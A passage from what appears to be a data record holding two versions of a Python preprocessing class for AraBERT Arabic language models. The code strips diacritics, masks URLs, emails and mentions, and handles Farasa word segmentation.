'\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\nprefix_list = ['ال', 'و', 'ف', 'ب', 'ك', 'ل', 'لل', 'ال', 'و', 'ف', 'ب',\n 'ك', 'ل', 'لل', 'س']\nsuffix_list = ['ه', 'ها', 'ك', 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن',\n 'كن', 'ا', 'ان', 'ين', 'ون', 'وا', 'ات', 'ت', 'ن', 'ة', 'ه', 'ها', 'ك',\n 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن', 'كن', 'ا', 'ان', 'ين', 'ون',\n 'وا', 'ات', 'ت', 'ن', 'ة']\nother_tokens = ['[رابط]', '[مستخدم]', '[بريد]']\nprefix_symbols = [(x + '+') for x in prefix_list]\nsuffix_symblos = [('+' + x) for x in suffix_list]\nnever_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))\nurl_regexes = [\n '(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n , '@(https?|ftp)://(-\\\\.)?([^\\\\s/?\\\\.#-]+\\\\.?)+(/[^\\\\s]*)?$@iS',\n 'http[s]?://[a-zA-Z0-9_\\\\-./~\\\\?=%&]+', 'www[a-zA-Z0-9_\\\\-?=%&/.~]+',\n '[a-zA-Z]+\\\\.com', '(?=http)[^\\\\s]+', '(?=www)[^\\\\s]+', '://']\nuser_mention_regex = '@[\\\\w\\\\d]+'\nemail_regexes = ['[\\\\w-]+@([\\\\w-]+\\\\.)+[\\\\w-]+', '\\\\S+@\\\\S+']\nredundant_punct_pattern = (\n '([!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ【»؛\\\\s+«–…‘]{2,})'\n )\nregex_tatweel = '(\\\\D)\\\\1{2,}'\nrejected_chars_regex = (\n '[^0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘]'\n )\nregex_url_step1 = '(?=http)[^\\\\s]+'\nregex_url_step2 = '(?=www)[^\\\\s]+'\nregex_url = (\n '(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n )\nregex_mention = '@[\\\\w\\\\d]+'\nregex_email = '\\\\S+@\\\\S+'\nchars_regex = (\n '0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘'\n )\nwhite_spaced_double_quotation_regex = '\\\\\"\\\\s+([^\"]+)\\\\s+\\\\\"'\nwhite_spaced_single_quotation_regex = \"\\\\'\\\\s+([^']+)\\\\s+\\\\'\"\nwhite_spaced_back_quotation_regex = '\\\\`\\\\s+([^`]+)\\\\s+\\\\`'\nwhite_spaced_em_dash = '\\\\—\\\\s+([^—]+)\\\\s+\\\\—'\nleft_spaced_chars = ' ([\\\\]!#\\\\$%\\\\),\\\\.:;\\\\?}٪’،؟”؛…»·])'\nright_spaced_chars = '([\\\\[\\\\(\\\\{“«‘*\\\\~]) '\nleft_and_right_spaced_chars = ' ([\\\\+\\\\-\\\\<\\\\=\\\\>\\\\@\\\\\\\\\\\\^\\\\_\\\\|\\\\–]) '\n",
"step-5": "import html\nimport logging\nimport re\n\nimport pyarabic.araby as araby\n\nACCEPTED_MODELS = [\n \"bert-base-arabertv01\",\n \"bert-base-arabert\",\n \"bert-base-arabertv02\",\n \"bert-base-arabertv2\",\n \"bert-large-arabertv02\",\n \"bert-large-arabertv2\",\n \"araelectra-base\",\n \"araelectra-base-discriminator\",\n \"araelectra-base-generator\",\n \"aragpt2-base\",\n \"aragpt2-medium\",\n \"aragpt2-large\",\n \"aragpt2-mega\",\n]\n\nSEGMENTED_MODELS = [\n \"bert-base-arabert\",\n \"bert-base-arabertv2\",\n \"bert-large-arabertv2\",\n]\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(\n self,\n model_name,\n keep_emojis=False,\n remove_html_markup=True,\n replace_urls_emails_mentions=True,\n strip_tashkeel=True,\n strip_tatweel=True,\n insert_white_spaces=True,\n remove_elongation=True,\n ):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace(\"aubmindlab/\", \"\")\n\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = \"bert-base-arabertv02\"\n else:\n self.model_name = model_name\n\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n \"Selected Model requires pre-segmentation, Initializing FarasaSegmenter\"\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n \"farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy\"\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n \"Keeping tweets with Farasa Segmentation is 10 times slower\"\n )\n\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == \"bert-base-arabert\":\n return self._old_preprocess(\n text,\n do_farasa_tokenization=True,\n )\n\n if self.model_name == \"bert-base-arabertv01\":\n return self._old_preprocess(text, do_farasa_tokenization=False)\n\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n\n if self.replace_urls_emails_mentions:\n # replace all possible URLs\n for reg in url_regexes:\n text = re.sub(reg, \" [رابط] \", text)\n # REplace Emails with [بريد]\n for reg in email_regexes:\n text = re.sub(reg, \" [بريد] \", text)\n # replace mentions with [مستخدم]\n text = re.sub(user_mention_regex, \" [مستخدم] \", text)\n\n if self.remove_html_markup:\n # remove html line breaks\n text = re.sub(\"<br />\", \" \", text)\n # remove html markup\n text = re.sub(\"</?[^>]+>\", \" \", text)\n\n # remove repeated characters >2\n if self.remove_elongation:\n text = self._remove_elongation(text)\n\n # insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets\n if self.insert_white_spaces:\n text = re.sub(\n \"([^0-9\\u0621-\\u063A\\u0641-\\u064A\\u0660-\\u0669a-zA-Z\\[\\]])\",\n r\" \\1 \",\n text,\n )\n\n # insert whitespace between words and numbers or numbers and words\n text = re.sub(\n \"(\\d+)([\\u0621-\\u063A\\u0641-\\u064A\\u0660-\\u066C]+)\", r\" \\1 \\2 \", text\n )\n text = re.sub(\n \"([\\u0621-\\u063A\\u0641-\\u064A\\u0660-\\u066C]+)(\\d+)\", r\" \\1 \\2 \", text\n )\n\n # remove unwanted characters\n if self.keep_emojis:\n emoji_regex = \"\".join(list(self.emoji.UNICODE_EMOJI[\"en\"].keys()))\n rejected_chars_regex2 = \"[^%s%s]\" % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, \" \", text)\n else:\n text = re.sub(rejected_chars_regex, \" \", text)\n\n # remove extra spaces\n text = \" \".join(text.replace(\"\\uFE0F\", \"\").split())\n\n if (\n self.model_name == \"bert-base-arabertv2\"\n or self.model_name == \"bert-large-arabertv2\"\n ):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI[\"en\"].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = \" \".join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n\n # ALl the other models dont require Farasa Segmentation\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n\n # removes the spaces around quotation marks ex: i \" ate \" an apple --> i \"ate\" an apple\n # https://stackoverflow.com/a/53436792/5381220\n text = re.sub(white_spaced_double_quotation_regex, '\"' + r\"\\1\" + '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + r\"\\1\" + \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, \"\\`\" + r\"\\1\" + \"\\`\", text)\n text = re.sub(white_spaced_back_quotation_regex, \"\\—\" + r\"\\1\" + \"\\—\", text)\n\n # during generation, sometimes the models don't put a space after the dot, this handles it\n text = text.replace(\".\", \" . \")\n text = \" \".join(text.split())\n\n # handle decimals\n text = re.sub(r\"(\\d+) \\. (\\d+)\", r\"\\1.\\2\", text)\n text = re.sub(r\"(\\d+) \\, (\\d+)\", r\"\\1,\\2\", text)\n\n text = re.sub(left_and_right_spaced_chars, r\"\\1\", text)\n text = re.sub(left_spaced_chars, r\"\\1\", text)\n text = re.sub(right_spaced_chars, r\"\\1\", text)\n\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace(\"+ \", \"+\")\n text = text.replace(\" +\", \"+\")\n text = \" \".join([self._desegmentword(word) for word in text.split(\" \")])\n return text\n\n def _desegmentword(self, orig_word: str) -> str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace(\"ل+ال+\", \"لل\")\n if \"ال+ال\" not in orig_word:\n word = word.replace(\"ل+ال\", \"لل\")\n word = word.replace(\"+\", \"\")\n word = word.replace(\"للل\", \"لل\")\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n\n text = re.sub(r\"\\d+\\/[ء-ي]+\\/\\d+\\]\", \"\", text)\n text = re.sub(\"ـ\", \"\", text)\n text = re.sub(\"[«»]\", ' \" ', text)\n\n if self.replace_urls_emails_mentions:\n # replace the [رابط] token with space if you want to clean links\n text = re.sub(regex_url_step1, \"[رابط]\", text)\n text = re.sub(regex_url_step2, \"[رابط]\", text)\n text = re.sub(regex_url, \"[رابط]\", text)\n text = re.sub(regex_email, \"[بريد]\", text)\n text = re.sub(regex_mention, \"[مستخدم]\", text)\n text = re.sub(\"…\", r\"\\.\", text).strip()\n text = self._remove_redundant_punct(text)\n\n if self.replace_urls_emails_mentions:\n text = re.sub(r\"\\[ رابط \\]|\\[ رابط\\]|\\[رابط \\]\", \" [رابط] \", text)\n text = re.sub(r\"\\[ بريد \\]|\\[ بريد\\]|\\[بريد \\]\", \" [بريد] \", text)\n text = re.sub(r\"\\[ مستخدم \\]|\\[ مستخدم\\]|\\[مستخدم \\]\", \" [مستخدم] \", text)\n\n if self.remove_elongation:\n text = self._remove_elongation(text)\n\n if self.insert_white_spaces:\n text = re.sub(\n \"([^0-9\\u0621-\\u063A\\u0641-\\u0669\\u0671-\\u0673a-zA-Z\\[\\]])\",\n r\" \\1 \",\n text,\n )\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in [\"[\", \"]\"]:\n continue\n if word in [\"رابط\", \"بريد\", \"مستخدم\"] and line_farasa[index - 1] in [\n \"[\",\n \"]\",\n ]:\n segmented_line.append(\"[\" + word + \"]\")\n continue\n if \"+\" not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n\n return \" \".join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = \"\"\n for i, c in enumerate(word):\n if c == \"+\":\n # if the token is KAF, it could be a suffix or prefix\n if temp_token == \"ك\":\n # if we are at the second token, then KAF is surely a prefix\n if i == 1:\n segmented_word.append(temp_token + \"+\")\n temp_token = \"\"\n # If the KAF token is between 2 tokens\n elif word[i - 2] == \"+\":\n # if the previous token is prefix, then this KAF must be a prefix\n if segmented_word[-1][-1] == \"+\":\n segmented_word.append(temp_token + \"+\")\n temp_token = \"\"\n # else it is a suffix, this KAF could not be a second suffix\n else:\n segmented_word.append(\"+\" + temp_token)\n temp_token = \"\"\n # if Kaf is at the end, this is handled with the statement after the loop\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + \"+\")\n temp_token = \"\"\n elif temp_token in suffix_list:\n segmented_word.append(\"+\" + temp_token)\n temp_token = \"\"\n else:\n segmented_word.append(temp_token)\n temp_token = \"\"\n continue\n temp_token += c\n if temp_token != \"\":\n if temp_token in suffix_list:\n segmented_word.append(\"+\" + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n\n if self.keep_emojis:\n # insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI[\"en\"].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in [\"[\", \"]\"]:\n continue\n if word in [\"رابط\", \"بريد\", \"مستخدم\"] and line_farasa[index - 1] in [\n \"[\",\n \"]\",\n ]:\n segmented_line.append(\"[\" + word + \"]\")\n continue\n segmented_word = []\n for token in word.split(\"+\"):\n if token in prefix_list:\n segmented_word.append(token + \"+\")\n elif token in suffix_list:\n segmented_word.append(\"+\" + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return \" \".join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n # loop over the number of times the regex matched the text\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = 